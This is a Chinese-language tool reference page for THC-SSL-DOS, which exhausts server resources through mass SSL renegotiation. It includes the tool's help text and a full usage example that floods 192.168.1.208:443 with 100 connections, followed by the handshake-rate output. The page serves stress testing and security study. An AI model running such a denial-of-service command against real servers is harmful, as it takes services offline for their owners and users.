THC-SSL-DOS 介绍

THC-SSL-DOS是用来验证SSL的性能。建立一个安全的SSL连接到服务器比在客户端上有15倍的处理能力。 THC-SSL-DOS利用这种不对称性通过过载服务器和停止互联网。此问题会影响今天所有SSL的实现。厂商都意识到这个问题,自2003年以来该问题被广泛讨论,通过单一的TCP连接触发数以千计的重新协商,这种攻击进一步利用了SSL安全的重新协商功能,。

资料来源:https://www.thc.org/thc-ssl-dos/
THC-SSL-DOS 首页
THC-SSL-DOS 源代码库

包含在THC-SSL-DOS里的工具

THC-SSL-DOS - 压力测试仪,使用SSL握手
:~# thc-ssl-dos -h

     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>
  -h      help
  -l <n>  Limit parallel connections [default: 400]

THC-SSL-DOS用法示例

使用100个连接(-L 100),防洪目标IP(192.168.1.208)和端口(443):

:~# thc-ssl-dos -l 100 192.168.1.208 443 --accept

     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err